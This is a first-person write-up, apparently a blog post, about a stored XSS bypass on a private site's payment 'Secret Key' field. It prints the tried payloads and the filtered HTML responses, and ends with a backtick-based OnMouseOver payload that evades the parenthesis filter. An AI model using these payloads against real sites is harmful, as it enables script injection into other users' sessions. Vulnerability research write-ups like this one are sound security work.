Story Of a Stored XSS Bypass

Hi readers ,

I am a Cyber Security Researcher from Bangladesh . This is my 1st write-up and also I am not good at XSS so forgive all mistakes .

Recently I was testing a private site and in that site users can add their personal information . I noticed a Input there named Secret Key which allows user to process payments and store transaction information to an application.

So I input a Normal payload :-

“><img src=x onerror=prompt(document.domain)>

and it got filtered and the page source was like :-

<input type="text" id="****" name="****" value="">&lt;img img" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

So from the source I understand that :-

1. quot (“) and greater-than (>) signs are not being filtered properly .
2. Malicious tags are being filtered . For that <img> become img img

So I have 2 possible way to execute JavaScript . 1st one is somehow bypass the less than (<) filter and the 2nd one is adding a malicious HTML Attributes to execute JavaScript . I tried many way to bypass the less than(<) Character but was unable to do . So I processed with 2nd way by adding a Malicious HTML Attributes . So I entered below payload :-

“ OnMouseOver=prompt(1)

Response was :-

<input type="text" id="****" name="****" value="" OnMouseOver=prompt&#40;" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

So I was able to add a HTML Attributes but Brackets are being filtered properly . So I entered below payload :-

“ OnMouseOver=prompt`1`

Response was :-

<input type="text" id="****" name="****" value="" OnMouseOver=prompt`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

But code Not executed . Take a closer look and the payload just need a quot (“) 🤔🤔🤔 :-

“ OnMouseOver=”prompt`1`

Response was :-

<input type="text" id="ipn_secret_keygen" name="ipn_secret_keygen" value=""OnMouseOver="alert`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

Looks good . Now I took my Mouse pointer on the Input and the OnMouseOver Event executed the XSS Popup 🤩🤩🤩

XSS Executed .

Thanks for reading . Hope will get time to write some more posts .

Find me on Facebook :-